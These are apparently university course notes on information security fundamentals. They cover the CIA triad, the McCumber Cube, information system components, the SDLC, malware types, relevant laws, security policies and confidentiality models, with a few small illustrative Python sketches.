DIS (CW3551) Notes
UNIT I INTRODUCTION
Introduction
James Anderson, executive consultant at Emagined Security, Inc., believes information
security in an enterprise is a “well-informed sense of assurance that the information risks
and controls are in balance.” He is not alone in his perspective.
Many information security practitioners recognize that aligning information security
needs with business objectives must be the top priority.
When used in a phishing attack, e-mail spoofing lures victims to a Web server that does
not represent the organization it purports to, in an attempt to steal their private data such
as account numbers and passwords.
The most common variants include posing as a bank or brokerage company, e-commerce
organization, or Internet service provider. A related technique, pretexting, involves
impersonating someone else under a fabricated scenario in order to obtain private
information; even when authorized, pretexting does not always lead to a satisfactory outcome.
In 2006, the chair of Hewlett-Packard's board, Patricia Dunn, authorized the use of
pretexting to investigate corporate directors suspected of leaking confidential information.
The resulting firestorm of negative publicity led to Ms. Dunn's eventual departure from the
company.13
3. Confidentiality Information has confidentiality when it is protected from disclosure or
exposure to unauthorized individuals or systems. Confidentiality ensures that only those
with the rights and privileges to access information are able to do so.
When unauthorized individuals or systems can view information, confidentiality is
breached.
To protect the confidentiality of information, you can use a number of measures,
including the following:
Information classification
Secure document storage
Application of general security policies
Education of information custodians and end users
Confidentiality
Individuals who transact with an organization expect that their personal information will
remain confidential, whether the organization is a federal agency, such as the Internal
Revenue Service, or a business.
Problems arise when companies disclose confidential information. Sometimes this
disclosure is intentional, but there are times when disclosure of confidential information
happens by mistake—for example, when confidential information is mistakenly e-mailed
to someone outside the organization rather than to someone inside the organization.
Several cases of privacy violation are outlined in Offline: Unintentional Disclosures.
Other examples of confidentiality breaches are an employee throwing away a document
containing critical information without shredding it, or a hacker who successfully breaks
into an internal database of a Web-based organization and steals sensitive information
about the clients, such as names, addresses, and credit card numbers.
4. Utility The utility of information is the quality or state of having value for some purpose
or end. Information has value when it can serve a purpose. If information is available, but
is not in a format meaningful to the end user, it is not useful.
5. Possession The possession of information is the quality or state of ownership or control.
Information is said to be in one’s possession if one obtains it, independent of format or
other characteristics. While a breach of confidentiality always results in a breach of
possession, a breach of possession does not always result in a breach of confidentiality.
NSTISSC SECURITY MODEL
The definition of information security presented is based in part on the CNSS document
called the National Training Standard for Information Systems Security
Professionals NSTISSI No. 4011.
This document presents a comprehensive information security model and has become a
widely accepted evaluation standard for the security of information systems. The model,
created by John McCumber in 1991, provides a graphical representation of the
architectural approach widely used in computer and information security; it is now known
as the McCumber Cube.17
The McCumber Cube, shown in Figure 1-6, has three dimensions. If extrapolated, the three
dimensions of each axis become a 3 × 3 × 3 cube with 27 cells representing areas that must be
addressed to secure today’s information systems.
To ensure system security, each of the 27 areas must be properly addressed during the
security process. For example, the intersection between technology, integrity, and storage
requires a control or safeguard that addresses the need to use technology to protect the
integrity of information while in storage.
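As a quick illustration of the 27 cells, the short Python sketch below enumerates every combination of the three axes. The axis labels used here (security goals, information states, and safeguards) are the commonly cited ones and are an assumption added to these notes, which name only the technology/integrity/storage example.

from itertools import product

# Illustrative enumeration of the 27 McCumber Cube cells: one cell per
# combination of security goal, information state, and safeguard.
goals = ["confidentiality", "integrity", "availability"]
states = ["storage", "processing", "transmission"]
safeguards = ["policy", "education", "technology"]

for goal, state, safeguard in product(goals, states, safeguards):
    print(f"Address {goal} of information during {state} using {safeguard}")

# One of the 27 cells corresponds to the example in the text: use technology
# to protect the integrity of information while it is in storage.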
What is commonly left out of such a model is the need for guidelines and policies that
provide direction for the practices and implementations of technologies.
COMPONENTS OF AN INFORMATION SYSTEM
As shown in Figure 1-7, an information system (IS) is much more than computer hardware;
it is the entire set of software, hardware, data, people, procedures, and networks that make
possible the use of information resources in the organization. These six critical components
enable information to be input, processed, output, and stored. Each of these IS
components has its own strengths and weaknesses, as well as its own characteristics and uses.
Each component of the information system also has its own security requirements.
Software
The software component of the IS comprises applications, operating systems, and
assorted command utilities. Software is perhaps the most difficult IS component to
secure.
The exploitation of errors in software programming accounts for a substantial portion of
the attacks on information. In fact, many facets of daily life are affected by buggy
software, from smartphones that crash to flawed automotive control computers that lead
to recalls.
Software carries the lifeblood of information through an organization. Unfortunately,
software programs are often created under the constraints of project management, which
limit time, cost, and manpower.
Hardware
Hardware is the physical technology that houses and executes the software, stores and
transports the data, and provides interfaces for the entry and removal of information from
the system.
Physical security policies deal with hardware as a physical asset and with the protection
of physical assets from harm or theft. Applying the traditional tools of physical security,
such as locks and keys, restricts access to and interaction with the hardware components
of an information system.
Securing the physical location of computers and the computers themselves is important
because a breach of physical security can result in a loss of information. Unfortunately,
most information systems are built on hardware platforms that cannot guarantee any level
of information security if unrestricted access to the hardware is possible.
Before September 11, 2001, laptop thefts in airports were common. A two-person team
worked to steal a computer as its owner passed it through the conveyor scanning devices.
The first perpetrator entered the security area ahead of an unsuspecting target and quickly
went through. Then, the second perpetrator waited behind the target until the target placed
his/her computer on the baggage scanner. As the computer was whisked through, the
second agent slipped ahead of the victim and entered the metal detector with a substantial
collection of keys, coins, and the like, thereby slowing the detection process and allowing
the first perpetrator to grab the computer and disappear in a crowded walkway. While the
security response to September 11, 2001 did tighten the security process at airports,
hardware can still be stolen in airports and other public places.
Although laptops and notebook computers are worth a few thousand dollars, the
information contained in them can be worth a great deal more to organizations and
individuals.
Data
Data stored, processed, and transmitted by a computer system must be protected. Data is
often the most valuable asset possessed by an organization and it is the main target of
intentional attacks. Systems developed in recent years are likely to make use of database
management systems. When done properly, this should improve the security of the data and
the application.
Unfortunately, many system development projects do not make full use of the database
management system’s security capabilities, and in some cases the database is
implemented in ways that are less secure than traditional file systems.
People
Though often overlooked in computer security considerations, people have always been a
threat to information security.
Around 1275 A.D., Kublai Khan finally achieved what the Huns had been trying to do for
thousands of years: breach the Great Wall of China. Initially, the Khan’s army tried to climb
over, dig under, and break through the wall. In the end, the Khan simply bribed the
gatekeeper—and the rest is
history. Whether this event actually occurred or not, the moral of the story is that people
can be the weakest link in an organization’s information security program.
And unless policy, education and training, awareness, and technology are properly
employed to prevent people from accidentally or intentionally damaging or losing
information, they will remain the weakest link.
Procedures
Another frequently overlooked component of an IS is procedures. Procedures are written
instructions for accomplishing a specific task. When an unauthorized user obtains an
organization’s procedures, this poses a threat to the integrity of the information.
For example, a consultant to a bank learned how to wire funds by using the computer
center’s procedures, which were readily available. By taking advantage of a security
weakness (lack of authentication), this bank consultant ordered millions of dollars to be
transferred by wire to his own account.
Most organizations distribute procedures to their legitimate employees so they can access
the information system, but many of these companies often fail to provide proper
education on the protection of the procedures.
Educating employees about safeguarding procedures is as important as physically
securing the information system. After all, procedures are information in their own right.
Therefore, knowledge of procedures, as with all critical information, should be
disseminated among members of the organization only on a need-to-know basis.
Networks
The IS component that created much of the need for increased computer and information
security is networking.
When information systems are connected to each other to form local area networks
(LANs), and these LANs are connected to other networks such as the Internet, new
security challenges rapidly emerge.
The physical technology that enables network functions is becoming more and more
accessible to organizations of every size. Applying the traditional tools of physical
security, such as locks and keys, to restrict access to and interaction with the hardware
components of an information system is still important; but when computer systems are
networked, this approach is no longer enough.
Balancing Information Security and Access
Even with the best planning and implementation, it is impossible to obtain perfect
information security. Information security cannot be absolute: it is a process, not a goal. It
is possible to make a system available to anyone, anywhere, anytime, through any means.
However, such unrestricted access poses a danger to the security of the information. On
the other hand, a completely secure information system would not allow anyone access.
For instance, when challenged to achieve a TCSEC C-2 level security certification for its
Windows operating system, Microsoft had to remove all networking components and
operate the computer from only the console in a secured room.
To achieve balance—that is, to operate an information system that satisfies the user and
the security professional—the security level must allow reasonable access, yet protect
against threats.
Figure 1-8 shows some of the competing voices that must be considered when balancing
information security and access. Because of today’s security concerns and issues, an
information system or data-processing department can get too entrenched in the
management and protection of systems.
An imbalance can occur when the needs of the end user are undermined by too heavy a
focus on protecting and administering the information systems. Both information security
technologists and end users must recognize that both groups share the same overall goals
of the organization—to ensure the data is available when, where, and how it is needed,
with minimal delays or obstacles. In an ideal world, this level of availability can be met
even after concerns about loss, damage, interception, or destruction have been addressed.
THE SDLC
The Systems Development Life Cycle
Information security must be managed in a manner similar to any other major system
implemented in an organization. One approach for implementing an information security
system in an organization with little or no formal security in place is to use a variation of
the systems development life cycle (SDLC): the security systems development life cycle
(SecSDLC). To understand a security systems development life cycle, you must first
understand the basics of the method upon which it is based.
At the end of each phase of the traditional SDLC comes a structured review or reality check,
during which the team determines if the project should be continued, discontinued, outsourced,
postponed, or returned to an earlier phase depending on whether the project is proceeding as
expected and on the need for additional expertise, organizational knowledge, or other resources.
Once the system is implemented, it is maintained (and modified) over the remainder of its
operational life. Any information systems implementation may have multiple iterations as
the cycle is repeated over time.
Only by means of constant examination and renewal can any system, especially an
information security program, perform up to expectations in the constantly changing
environment in which it is placed. The following sections describe each phase of the
traditional SDLC.20
Investigation
The first phase, investigation, is the most important. What problem is the system being
developed to solve? The investigation phase begins with an examination of the event or
plan that initiates the process. During the investigation phase, the objectives, constraints,
and scope of the project are specified.
A preliminary cost-benefit analysis evaluates the perceived benefits and the appropriate
levels of cost for those benefits. At the conclusion of this phase, and at every phase
following, a feasibility analysis assesses the economic, technical, and behavioral
feasibilities of the process and ensures that implementation is worth the organization’s
time and effort.
Analysis
The analysis phase begins with the information gained during the investigation phase.
This phase consists primarily of assessments of the organization, its current systems, and
its capability to support the proposed systems. Analysts begin by determining what the
new system is expected to do and how it will interact with existing systems. This phase
ends with the documentation of the findings and an update of the feasibility analysis.
Logical Design
In the logical design phase, the information gained from the analysis phase is used to
begin creating a systems solution for a business problem. In any systems solution, it is
imperative that the first and driving factor is the business need.
Based on the business need, applications are selected to provide needed services, and then
data support and structures capable of providing the needed inputs are chosen. Finally,
based on all of the above, specific technologies to implement the physical solution are
delineated. The logical design is, therefore, the blueprint for the desired solution. The
logical design is implementation independent, meaning that it contains no reference to
specific technologies, vendors, or products.
It addresses, instead, how the proposed system will solve the problem at hand. In this
stage, analysts generate a number of alternative solutions, each with corresponding
strengths and weaknesses, and costs and benefits, allowing for a general comparison of
available options. At the end of this phase, another feasibility analysis is performed.
Physical Design
During the physical design phase, specific technologies are selected to support the
alternatives identified and evaluated in the logical design. The selected components are
evaluated based on a make-or-buy decision (develop the components in-house or
purchase them from a vendor).
Final designs integrate various components and technologies. After yet another feasibility
analysis, the entire solution is presented to the organizational management for approval.
Implementation
In the implementation phase, any needed software is created. Components are ordered,
received, and tested. Afterward, users are trained and supporting documentation created.
Once all components are tested individually, they are installed and tested as a system.
Again a feasibility analysis is prepared, and the sponsors are then presented with the
system for a performance review and acceptance test.
Maintenance and Change
The maintenance and change phase is the longest and most expensive phase of the
process. This phase consists of the tasks necessary to support and modify the system for
the remainder of its useful life cycle. Even though formal development may conclude
during this phase, the life cycle of the project continues until it is determined that the
process should begin again from the investigation phase.
At periodic points, the system is tested for compliance, and the feasibility of continuance
versus discontinuance is evaluated. Upgrades, updates, and patches are managed. As the
needs of the organization change, the systems that support the organization must also
change.
It is imperative that those who manage the systems, as well as those who support them,
continually monitor the effectiveness of the systems in relation to the organization’s
environment. When a current system can no longer support the evolving mission of the
organization, the project is terminated and a new project is implemented.
Investigation/Analysis Phases
Security categorization—defines three levels (i.e., low, moderate, or high) of potential
impact on organizations or individuals should there be a breach of security (a loss of
confidentiality, integrity, or availability). Security categorization standards assist
organizations in making the appropriate selection of security controls for their
information systems (a brief illustrative sketch follows these items).
Preliminary risk assessment—results in an initial description of the basic security needs
of the system. A preliminary risk assessment should define the threat environment in
which the system will operate.
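As a brief illustrative sketch of the security categorization idea referred to above, the Python fragment below rates each security objective as low, moderate, or high and takes the highest rating as the overall category. The "highest rating wins" rule and the example system are assumptions for illustration, not requirements stated in these notes.

# Illustrative FIPS 199-style categorization: rate the potential impact of a
# breach for each security objective, then take the highest rating overall.
IMPACT = {"low": 0, "moderate": 1, "high": 2}

def overall_category(ratings):
    # ratings maps 'confidentiality', 'integrity', 'availability' to a level
    return max(ratings.values(), key=lambda level: IMPACT[level])

payroll_system = {"confidentiality": "moderate", "integrity": "high", "availability": "low"}
print(overall_category(payroll_system))   # -> 'high'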
Some types of security controls (primarily those of a non-technical nature) cannot be tested
and evaluated until the information system is deployed; these are typically management and
operational controls. Other planning components—ensure that all necessary components of the
development process are considered when incorporating security into the life cycle. These
components include selection of the appropriate contract type, participation by all necessary
functional groups within an organization, participation by the certifier and accreditor, and
development and execution of necessary contracting plans and processes.
Implementation Phase
Inspection and acceptance—ensures that the organization validates and verifies that the
functionality described in the specification is included in the deliverables. System
integration—ensures that the system is integrated at the operational site where the
information system is to be deployed for operation.
Security control settings and switches are enabled in accordance with vendor instructions
and available security implementation guidance. Security certification—ensures that the
controls are effectively implemented through established verification techniques and
procedures and gives organization officials confidence that the appropriate safeguards and
countermeasures are in place to protect the organization’s information system.
Security certification also uncovers and describes the known vulnerabilities in the
information system. Security accreditation—provides the necessary security authorization
of an information system to process, store, or transmit information that is required. This
authorization is granted by a senior organization official and is based on the verified
effectiveness of security controls to some agreed upon level of assurance and an
identified residual risk to agency assets or operations.
Maintenance and Change Phase
Configuration management and control—ensures adequate consideration of the potential
security impacts due to specific changes to an information system or its surrounding
environment. Configuration management and configuration control procedures are critical
to establishing an initial baseline of hardware, software, and firmware components for the
information system and subsequently controlling and maintaining an accurate inventory
of any changes to the system.
Continuous monitoring—ensures that controls continue to be effective in their application
through periodic testing and evaluation. Security control monitoring (i.e., verifying the
continued effectiveness of those controls over time) and reporting the security status of
the information system to appropriate agency officials is an essential activity of a
comprehensive information security program. Information preservation—ensures that, where
necessary, information is retained to conform to current legal requirements and to
accommodate future technology changes that may render the retrieval method obsolete.
UNIT II SECURITY INVESTIGATION
Need for Security, Business Needs, Threats, Attacks, Legal, Ethical and
Professional Issues - An Overview of Computer Security - Access Control
Matrix, Policy-Security policies, Confidentiality policies, Integrity policies
and Hybrid policies
Security Investigation:
Investigate suspicious email. Investigate suspicious logins, system behavior, and networking
traffic. Pull forensic system images for certain system breaches, legal issues, or to determine
risk/exposure when a system is compromised or stolen.
Business Needs:
Information security performs several important functions for an organization: it protects the
organization's ability to function, enables the safe operation of applications running on the
organization's IT systems, protects the data the organization collects and uses, and safeguards
the organization's technology assets.
Threat:
Information Security threats can be many like Software attacks, theft of intellectual
property, identity theft, theft of equipment or information, sabotage, and information
extortion.
A threat can be anything that can take advantage of a vulnerability to breach security and
negatively alter, erase, or harm an object or objects of interest.
Threats to Information Security:
1. Types of Cyber Attacks:
Cyber attacks are a major threat to information security and can take many forms,
including:
Malware: Malicious software designed to damage or disrupt computer systems. This
includes viruses, worms, and Trojans.
Phishing: Fraudulent emails or websites designed to trick users into disclosing sensitive
information such as passwords or credit card numbers.
Denial of Service (DoS) attacks: Attacks that aim to make a system or network
unavailable to its intended users by overwhelming it with traffic.
Ransomware: Malware that encrypts files on a computer system and demands a
ransom payment in exchange for the decryption key.
Social engineering: The use of psychological manipulation to trick individuals into
disclosing sensitive information or performing actions that compromise security.
2. Risks posed by Cyber Attacks:
Cyber attacks pose a significant risk to organizations and individuals. Some of the risks
posed by these attacks include:
Data Loss: Cyber attacks can result in the theft or destruction of sensitive information,
leading to data loss.
Reputation Damage: Cyber attacks can damage an organization’s reputation and
credibility, which can be difficult and expensive to repair.
Attacks:
Attacks are classified as passive or active. A passive attack is an attempt to learn or make use
of information from the system without affecting system resources, whereas an active attack is
an attempt to alter system resources or affect their operation.
Passive Attacks − Passive attacks are in the nature of eavesdropping on, or monitoring of,
transmissions. The goal of the opponent is to obtain information that is being transmitted. Two
types of passive attacks are the release of message contents and traffic analysis.
The release of message contents is easy to understand. A telephone conversation, an electronic
mail message, or a transferred file may contain sensitive or confidential data. We would like to
prevent an opponent from learning the contents of these transmissions.
A second type of passive attack is traffic analysis. Suppose we have a way of masking the
contents of messages or other information traffic so that opponents, even if they captured the
messages, could not extract the information from them. The common technique for masking
contents is encryption. Even with encryption protection in place, an opponent may still be able
to observe the pattern of these messages: the opponent can determine the location and identity
of the communicating hosts and can observe the frequency and length of messages being
exchanged. This information can be useful in guessing the nature of the communication that
was taking place.
Active Attacks − Active attacks involve some modification of the data stream or the creation
of a false stream, and can be subdivided into four categories: masquerade, replay, modification
of messages, and denial of service.
Replay − Replay involves the passive capture of a data unit and its subsequent retransmission
to produce an unauthorized effect.
Masquerade − A masquerade takes place when one entity pretends to be a different entity. A
masquerade attack usually includes one of the other forms of active attack. For instance,
authentication sequences can be captured and replayed after a valid authentication sequence
has taken place, thereby enabling an authorized entity with few privileges to obtain extra
privileges by impersonating an entity that has those privileges.
Modification of messages − Modification of messages simply means that some portion of a
legitimate message is altered, or that messages are delayed or reordered, to produce an
unauthorized effect.
Denial of Service − The denial of service prevents or inhibits the normal use or management
of communications facilities. This attack may have a specific target; for instance, an entity
may suppress all messages directed to a particular destination.
Software attacks mean attacks by viruses, worms, Trojan horses, etc. Many users believe
that malware, viruses, worms, and bots are all the same thing. They are not; the only
similarity is that they are all malicious software, and each behaves differently.
Malware is a combination of two terms: malicious and software. Malware basically
means malicious software—an intrusive program or code designed to perform malicious
operations on a system. Malware can be divided into two categories:
1) Infection methods
2) Malware actions
Malware on the basis of infection method includes the following:
1. Virus – Viruses have the ability to replicate themselves by hooking themselves onto
programs or files on the host computer, such as songs and videos, and they then travel all
over the Internet. The Creeper virus was first detected on ARPANET. Examples include
file viruses, macro viruses, boot sector viruses, stealth viruses, etc.
2. Worms – Worms are also self-replicating in nature, but they do not hook themselves to
programs on the host computer. The biggest difference between viruses and worms is that
worms are network-aware: they can easily travel from one computer to another if a
network is available. On the target machine they may not do much direct harm; they will,
for example, consume hard disk space, thus slowing down the computer.
3. Trojan – The Concept of Trojan is completely different from the viruses and worms.
The name Trojan is derived from the ‘Trojan Horse’ tale in Greek mythology, which
explains how the Greeks were able to enter the fortified city of Troy by hiding their
soldiers in a big wooden horse given to the Trojans as a gift. The Trojans were very
fond of horses and trusted the gift blindly. In the night, the soldiers emerged and
attacked the city from the inside.
Their purpose is to conceal themselves inside software that seems legitimate, and when
that software is executed they do their task of either stealing information or fulfilling
whatever other purpose they are designed for.
They often provide a backdoor gateway for malicious programs or malevolent users to
enter your system and steal your valuable data without your knowledge and permission.
Examples include FTP Trojans, proxy Trojans, remote access Trojans, etc.
4. Bots – Bots can be seen as an advanced form of worms. They are automated processes
designed to interact over the Internet without the need for human interaction. They can
be good or bad. A malicious bot can infect one host and, after infecting it, will create a
connection to a central server which provides commands to all infected hosts attached to
that network, called a botnet.
Malware on the basis of actions includes the following:
1. Adware – Adware is not exactly malicious, but it does breach the privacy of users. It
displays ads on a computer’s desktop or inside individual programs. Adware comes
attached with free-to-use software and is thus the main source of revenue for such
developers. It monitors your interests and displays relevant ads. An attacker can embed
malicious code inside adware, and adware can then monitor your system activities and
even compromise your machine.
2. Spyware – It is a program, or we can say software, that monitors your activities on a
computer and reveals the collected information to an interested party. Spyware is
generally dropped by Trojans, viruses, or worms. Once dropped, it installs itself and sits
silently to avoid detection.
One of the most common examples of spyware is a KEYLOGGER. The basic job of a
keylogger is to record user keystrokes with timestamps, thus capturing interesting
information like usernames, passwords, credit card details, etc.
3. Ransomware – It is a type of malware that will either encrypt your files or lock your
computer, making it inaccessible either partially or wholly. A screen is then displayed
asking for money, i.e., a ransom, in exchange.
4. Scareware – It masquerades as a tool to help fix your system, but when the software is
executed it will infect your system or completely destroy it. The software will display a
message to frighten you and force you to take some action, like paying them to fix your
system.
5. Rootkits – Rootkits are designed to gain root access, or we can say administrative
privileges, on the user’s system. Once root access is gained, the exploiter can do anything,
from stealing private files to stealing private data.
6. Zombies – They work similarly to spyware. The infection mechanism is the same, but
they do not spy and steal information; rather, they wait for commands from hackers.
Law and Ethics in Information Security
o Civil law
o Criminal law
o Tort law
o Private law
o Public law
Relevant U.S. Laws – General
Computer Fraud and Abuse Act of 1986
National Information Infrastructure Protection Act of 1996
USA Patriot Act of 2001
Telecommunications Deregulation and Competition Act of 1996
Communications Decency Act (CDA)
Computer Security Act of 1987
Privacy
The issue of privacy has become one of the hottest topics in information security.
The ability to collect information on an individual, combine facts from separate sources, and
merge it with other information has resulted in databases of information that were previously
impossible to set up.
The aggregation of data from multiple sources permits unethical organizations to build
databases of facts with frightening capabilities.
Privacy of Customer Information
Privacy of Customer Information Section of Common Carrier Regulations
Federal Privacy Act of 1974
The Electronic Communications Privacy Act of 1986
The Health Insurance Portability & Accountability Act of 1996 (HIPAA), also known as the
Kennedy-Kassebaum Act
The Financial Services Modernization Act or Gramm-Leach-Bliley Act of 1999
Key U.S. Laws of Interest to Information Security Professionals:
Export and Espionage Laws
Economic Espionage Act (EEA) of 1996
Security and Freedom Through Encryption Act of 1997 (SAFE)
US Copyright Law
Intellectual property is recognized as a protected asset in the US.
US copyright law extends this right to the published word, including electronic formats.
Fair use of copyrighted materials includes:
- the use to support news reporting, teaching, scholarship, and a number of other related
permissions
- the purpose of the use has to be for educational or library purposes, not for profit, and
should not be excessive
Freedom of Information Act of 1966 (FOIA)
- US Government agencies are required to disclose any requested information on receipt of a
written request
State & Local Regulations
International Laws and Legal Bodies
Recently the Council of Europe drafted the European Council Cyber-Crime Convention,
designed to create an international task force to oversee a range of security functions
associated with Internet activities, and to standardize technology laws across international
borders.
The Digital Millennium Copyright Act (DMCA) is the US version of an international effort to
reduce the impact of copyright, trademark, and privacy infringement.
The European Union Directive 95/46/EC increases protection of individuals with regard to
the processing of personal data and limits the free movement of such data.
The United Kingdom has already implemented a version of this directive called the Database
Right.
United Nations Charter
To some degree the United Nations Charter provides provisions for information security
during Information Warfare.
Information Warfare (IW) involves the use of information technology to conduct offensive
operations as part of an organized and lawful military operation by a sovereign state.
IW is a relatively new application of warfare, although the military has been conducting
electronic warfare and counter-warfare operations for decades: jamming, intercepting, and
spoofing enemy communications.
Policy Versus Law
Most organizations develop and formalize a body of expectations called policy.
Policies function in an organization like laws.
For a policy to become enforceable, it must be:
- Distributed to all individuals who are expected to comply with it
- Readily available for employee reference
- Easily understood, with multi-language translations and translations for visually impaired
or literacy-impaired employees
- Acknowledged by the employee, usually by means of a signed consent form
Only when all conditions are met does the organization have a reasonable expectation of
effective policy.
Ethical Concepts in Information Security
Cultural Differences in Ethical Concepts
Differences in cultures cause problems in determining what is ethical and what is not ethical.
Studies of ethical sensitivity to computer use reveal that different nationalities have different
perspectives.
Difficulties arise when one nationality's ethical behaviour contradicts that of another national
group.
Ethics and Education
Deterrence to Unethical and Illegal Behavior
Deterrence - preventing an illegal or unethical activity.
Laws, policies, and technical controls are all examples of deterrents.
Laws and policies only deter if three conditions are present:
- Fear of penalty
- Probability of being caught
- Probability of penalty being administered
An overview of computer security:
Confidentiality: This term covers two related concepts:
Data confidentiality: Assures that private or confidential information is not made available
or disclosed to unauthorized individuals.
Privacy: Assures that individuals control or influence what information related to them may
be collected and stored and by whom and to whom that information may be disclosed.
■Integrity: This term covers two related concepts: Data integrity: Assures that information
(both stored and in transmitted packets) and programs are changed only in a specified and
authorized manner. System integrity: Assures that a system performs its intended function in
an unimpaired manner, free from deliberate or inadvertent unauthorized manipulation of the
system.
■Availability: Assures that systems work promptly and service is not denied to authorized
users. These three concepts form what is often referred to as the CIA triad. The three
concepts embody the fundamental security objectives for both data and for information and
computing services. For example, the NIST standard FIPS 199 (Standards for Security
Categorization of Federal Information and Information Systems) lists confidentiality,
integrity, and availability as the three security objectives for information and for information
systems. FIPS 199 provides a useful characterization of these three objectives in terms of
requirements and the definition of a loss of security in each category:
■Confidentiality: Preserving authorized restrictions on information access and disclosure,
including means for protecting personal privacy and proprietary information. A loss of
confidentiality is the unauthorized disclosure of information.
■ Integrity: Guarding against improper information modification or destruction, including
ensuring information nonrepudiation and authenticity. A loss of integrity is the unauthorized
modification or destruction of information.
■Availability: Ensuring timely and reliable access to and use of information. A loss of
availability is the disruption of access to or use of information or an information system.
■Authenticity: The property of being genuine and being able to be verified and trusted;
confidence in the validity of a transmission, a message, or message originator. This means
verifying that users are who they say they are and that each input arriving at the system came
from a trusted source.
■Accountability: The security goal that generates the requirement for actions of an entity to
be traced uniquely to that entity. This supports nonrepudiation, deterrence, fault isolation,
intrusion detection and prevention, and after-action recovery and legal action. Because truly
secure systems are not yet an achievable goal, we must be able to trace a security breach to a
responsible party. Systems must keep records of their activities to permit later forensic
analysis to trace security breaches or to aid in transaction disputes.
Policy-Security Policies:
1) It increases efficiency.
The best thing about having a policy is being able to increase the level of consistency which
saves time, money and resources. The policy should inform the employees about their
individual duties, telling them what they can do and what they cannot do with the
organization's sensitive information.
2) It upholds discipline and accountability
When any human mistake occurs and system security is compromised, the security policy of
the organization will back up any disciplinary action and also support a case in a court of law.
The organization's policies act as a contract which proves that an organization has taken steps
to protect its intellectual property, as well as its customers and clients.
3) It can make or break a business deal
It is not necessary for companies to provide a copy of their information security policy to
other vendors during a business deal that involves the transference of their sensitive
information. This is especially true of bigger businesses, which ensure their own security
interests are protected when dealing with smaller businesses that have less high-end security
systems in place.
4) It helps to educate employees on security
A well-written security policy can also be seen as an educational document which informs the
readers about the importance of their responsibility in protecting the organization's sensitive
data. It covers everything from choosing the right passwords to providing guidelines for file
transfers and data storage, and it increases employees' overall awareness of security and how
it can be strengthened.
We use security policies to manage our network security. Most types of security policies are
automatically created during the installation. We can also customize policies to suit our
specific environment. Some important cybersecurity policies are described below.
1. Virus and Spyware Protection policy
o It helps to detect, remove, and repair the side effects of viruses and security risks by
using signatures.
o It helps to detect threats in files which users try to download by using reputation data
from Download Insight.
o It helps to detect applications that exhibit suspicious behaviour by using SONAR
heuristics and reputation data.
2. Firewall Policy
o It blocks the unauthorized users from accessing the systems and networks that connect
to the Internet.
o It detects the attacks by cybercriminals.
o It removes the unwanted sources of network traffic.
3. Intrusion Prevention policy
This policy automatically detects and blocks network attacks and browser attacks. It also
protects applications from vulnerabilities. It checks the contents of one or more data packets
and detects malware which is coming through legal ways.
4. LiveUpdate policy
This policy can be categorized into two types: the LiveUpdate Content policy and the
LiveUpdate Settings policy. The LiveUpdate policy contains the settings which determine
when and how client computers download content updates from LiveUpdate. We can define
the computers that clients contact to check for updates and schedule when and how often
client computers check for updates.
5. Application and Device Control policy
This policy protects a system's resources from applications and manages the peripheral
devices that can attach to a system. The device control policy applies to both Windows and
Mac computers, whereas the application control policy can be applied only to Windows clients.
6. Exceptions policy
This policy provides the ability to exclude applications and processes from detection by the
virus and spyware scans.
7. Host Integrity policy
This policy provides the ability to define, enforce, and restore the security of client computers
to keep enterprise networks and data secure. We use this policy to ensure that the client
computers which access our network are protected and compliant with the company's security
policies. This policy requires that the client system has antivirus software installed.
A security policy doesn’t provide specific low-level technical guidance, but it does spell out
the intentions and expectations of senior management in regard to security. It’s then up to the
security or IT teams to translate these intentions into specific technical actions.
For example, a policy might state that only authorized users should be granted access to
proprietary company information. The specific authentication systems and access control
rules used to implement this policy can change over time, but the general intent remains the
same. Without a place to start from, the security or IT teams can only guess senior
management’s desires. This can lead to inconsistent application of security controls across
different groups and business entities.
Without a security policy, each employee or user will be left to his or her own judgment in
deciding what’s appropriate and what’s not. This can lead to disaster when different
employees apply different standards.
Is it appropriate to use a company device for personal use? Can a manager share passwords
with their direct reports for the sake of convenience? What about installing unapproved
software? Without clear policies, different employees might answer these questions in
different ways. A security policy should also clearly spell out how compliance is monitored
and enforced.
A good security policy can enhance an organization’s efficiency. Its policies get everyone on
the same page, avoid duplication of effort, and provide consistency in monitoring and
enforcing compliance. Security policies should also provide clear guidance for when policy
exceptions are granted, and by whom.
To achieve these benefits, in addition to being implemented and followed, the policy will also
need to be aligned with the business goals and culture of the organization.
Confidentiality policies:
Confidentiality is the protection of information in the system so that an unauthorized
person cannot access it. This type of protection is most important in military and
government organizations that need to keep plans and capabilities secret from enemies.
However, it can also be useful to businesses that need to protect their proprietary trade
secrets from competitors or prevent unauthorized persons from accessing the company’s
sensitive information (e.g., legal, personal, or medical information). Privacy issues have
gained an increasing amount of attention in the past few years, placing the importance of
confidentiality on protecting personal information maintained in automated systems by both
government agencies and private-sector organizations. Confidentiality must be well-
defined, and procedures for maintaining confidentiality must be carefully implemented. A
crucial aspect of confidentiality is user identification and authentication. Positive
identification of each system user is essential in order to ensure the effectiveness of policies
that specify who is allowed access to which data items.
Threats to Confidentiality: Confidentiality can be compromised in several ways. The
following are some of the commonly encountered threats to information confidentiality –
Hackers
Masqueraders
Unauthorized user activity
Unprotected downloaded files
Local area networks (LANs)
Trojan Horses
Confidentiality Models: Confidentiality models are used to describe what actions must be
taken to ensure the confidentiality of information. These models can specify how security
tools are used to achieve the desired level of confidentiality. The most commonly used
model for describing the enforcement of confidentiality is the Bell-LaPadula model.
This model describes the relationship between objects (i.e., the files, records, programs,
and equipment that contain or receive information) and subjects (i.e., the persons, processes,
or devices that cause the information to flow between the objects).
The relationships are described in terms of the subject’s assigned level of access or
privilege and the object’s level of sensitivity. In military terms, these would be
described as the security clearance of the subject and the security classification of the
object.
Another type of model that is commonly used is the access control model.
It organizes the system into objects (i.e., resources being acted on), subjects (i.e., the
person or program doing the action), and operations (i.e., the process of interaction).
A set of rules specifies which operations can be performed on an object by which subjects.
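The two models described above can be illustrated with a short Python sketch. The level names, subjects, objects, and operations below are purely illustrative assumptions: the first function applies the Bell-LaPadula-style rule that a subject may read an object only if its clearance is at least the object's classification, and the dictionary plays the role of an access control matrix.

# Bell-LaPadula-style read check: the subject's clearance must dominate the
# object's classification ("no read up").
LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2, "top secret": 3}

def blp_can_read(subject_clearance, object_classification):
    return LEVELS[subject_clearance] >= LEVELS[object_classification]

# Access control model: a matrix indexed by (subject, object) whose cells
# hold the operations that subject may perform on that object.
acm = {
    ("alice", "payroll.db"): {"read", "write"},
    ("bob", "payroll.db"): {"read"},
}

def acm_allows(subject, obj, operation):
    return operation in acm.get((subject, obj), set())

print(blp_can_read("secret", "confidential"))    # True: reading down is allowed
print(blp_can_read("confidential", "secret"))    # False: no read up
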